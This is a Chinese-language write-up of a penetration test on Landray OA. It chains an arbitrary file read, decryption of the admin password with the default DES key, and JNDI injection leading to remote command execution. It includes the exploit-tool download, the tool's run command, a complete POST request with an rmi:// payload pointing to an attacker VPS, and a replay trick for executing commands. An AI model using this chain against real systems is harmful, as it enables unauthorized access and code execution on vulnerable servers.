0、有因��有果

一个shell nk

1、蓝凌oa漏洞系列之-任意文件读取（绝对路径）

2、使用网上的poc读取管理员密码配置文件得到加密的管理员密码，发现未成功//参考链接：http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20SSRF+JNDI%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.html>

3、猜测路径不对，或者不能通过相对路径进行文件读取思路：通过查看历史命令来复原此应用的绝对路径

//此时管理员密码配置文件的路径为：/home/ekp/ekp/WEB-INF/KmssConfig/admin.properties

4、读取管理员密码配置文件，并解密//用 DES方法 解密，默认密钥为 kmssAdminKey

5、蓝凌oa漏洞系列之JNDI远程命令执行

//利用刚刚得到的密码，访问 admin.do 进行登录

//vps上下载相关工具

wget https://github.com/welk1n/JNDI-InjectionExploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

//运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

//构造请求包：（替换cookie）POST /admin.do HTTP/1.1Host: Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967Content-Length: 70Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"Sec-Ch-Ua-Mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Origin: Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg

//复制并运行jdk 1.7相关的rmi命令

//此时，vps已看到请求，但是dnslog迟迟没有反应，难道是操作有误？？？

//仔细看了看文库里面的图，发现目标机器并没有请求我vps上生成的class文件。

//开始思考是否整个流程中出现了失误，于是推到重来，反反复复。

//在即将放弃的时候，尝试了一下重放ldap命令（看了几篇复现文章，均没有涉及到这个点，都是执行rmi后会自动请求生成的class文件），然后就成功执行命令了（先重放rmi命令生成class文件，再重放ldap命令来请求刚刚生成的class文件）

//成功在于不断地尝试…

6、乐哉，悲哉分区 漏洞挖掘 的第 4 页…可惜，数十年的手速，败在了效率上面。